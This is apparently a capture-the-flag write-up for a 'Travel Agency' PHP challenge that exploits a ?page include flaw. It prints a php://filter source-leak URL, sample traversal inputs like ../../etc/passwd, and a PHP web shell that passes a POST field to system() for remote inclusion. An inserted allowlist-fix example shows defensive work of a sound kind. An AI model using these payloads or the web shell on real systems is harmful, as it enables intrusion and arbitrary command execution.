Travel Agency
LFI + RFI
Description
A travel agency website that lets users explore destinations from all over the world. The dev team recently added a "preview template" feature that dynamically loads different pages based on user selection.
Everything looks smooth on the surface, but a careless implementation might have left the site vulnerable to more than just wanderlust...
Can you dig into the source and go on a remote adventure to retrieve the flag?
Homepage

After clicking through the other pages there was no dynamic output from our input, but I noticed that each page was loaded through a ?page
parameter, which made me think of LFI.
I pulled the index.php source using the base64 filter, since this was LFI (the file is included and executed) and not plain file disclosure. If it were file disclosure, we could have pulled index.php without base64, because the server would not have executed the PHP code.
http://13.201.125.136:54827/index.php?page=php://filter/convert.base64-encode/resource=index.php

Here's the vulnerable logic: it's using PHP's include
on the user-supplied page value.

If we look at Example 3
of the manual page above, it shows that include()
can also load pages over HTTP,
which is what makes RFI possible here.
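To make the root cause concrete, here is an added example (not code from the writeup or the challenge) that puts the vulnerable include pattern next to an allowlist-based fix. The page names and the pages/ directory are assumptions; the only thing taken from the writeup is the idea that ?page is passed straight to include. The safe version never lets the request choose a path or a stream wrapper, so php://filter and http:// inputs are rejected before include() ever sees them, and the ini check shows the setting that must be off for include() to refuse remote URLs.

```php
<?php
// Added example, not from the writeup: vulnerable include vs. allowlisted include.

// Vulnerable pattern: the ?page value is handed to include() unchanged.
// php://filter/... wrappers turn this into source disclosure, ../ turns it
// into local file reads, and with allow_url_include=On an http:// value
// becomes remote file inclusion.
function resolve_page_vulnerable(string $page): string
{
    return $page; // exactly what include() would receive
}

// Hardened pattern: request values are only ever keys into a fixed map.
// The file names here are assumed for the example.
const PAGE_ALLOWLIST = [
    'home'    => 'home.php',
    'flights' => 'flights.php',
    'hotels'  => 'hotels.php',
    'tours'   => 'tours.php',
];

function resolve_page_safe(string $page, string $baseDir = __DIR__ . '/pages'): ?string
{
    // Anything that is not a known key is rejected; no path, wrapper or
    // traversal sequence from the request can reach include().
    if (!array_key_exists($page, PAGE_ALLOWLIST)) {
        return null;
    }
    return $baseDir . '/' . PAGE_ALLOWLIST[$page];
}

// Defence in depth: even a safe resolver should run with remote includes
// disabled. allow_url_include is a real php.ini directive; it cannot be
// changed at runtime, so this only reports the current state.
function remote_include_disabled(): bool
{
    return !filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

// Constructed sample inputs mirroring the kinds of values seen in the writeup
// (the remote URL is a placeholder, not a real host).
$samples = [
    'home',
    'php://filter/convert.base64-encode/resource=index.php',
    'http://example.invalid/page.txt',
    '../../etc/passwd',
];

foreach ($samples as $input) {
    $safe = resolve_page_safe($input, '/var/www/html/pages');
    printf("%-55s vulnerable -> %s\n", $input, resolve_page_vulnerable($input));
    printf("%-55s safe       -> %s\n", '', $safe ?? 'REJECTED');
}
printf("allow_url_include is %s\n", remote_include_disabled() ? 'Off (good)' : 'On (remote includes possible)');

// In the real handler the only change needed is:
//   $target = resolve_page_safe($_GET['page'] ?? 'home');
//   if ($target === null) { http_response_code(404); exit; }
//   include $target;
```

Of the four sample values only home resolves to a file; the three attack-shaped values are rejected by the allowlist rather than by trying to pattern-match wrappers or ../, which is the check that tends to be bypassed.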
RFI
<html>
<body>
# SNIPPED
<h2>Execute Command</h2>
<form method="POST">
<input type="text" name="cmd" placeholder="Input command..." autocomplete="off" required>
<input type="submit" value="Run">
</form>
<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
$cmd = $_POST["cmd"];
echo "<h3>Output:</h3><pre>";
system($cmd);
echo "</pre>";
}
?>
</body>
</html>

total 24
drwxrwxrwx 1 www-data www-data 34 Jun 27 10:07 .
drwxr-xr-x 1 root root 18 Jun 27 10:07 ..
-rw-r--r-- 1 root root 113 Jun 27 10:05 S3cRetP4g329658.html
-rw-r--r-- 1 root root 800 Jun 27 07:19 flights.php
-rw-r--r-- 1 root root 263 Jun 27 07:19 home.php
-rw-r--r-- 1 root root 761 Jun 27 07:19 hotels.php
-rw-r--r-- 1 root root 2059 Jun 27 07:19 index.php
-rw-r--r-- 1 root root 572 Jun 27 07:19 tours.php

heapbytes' still pwning.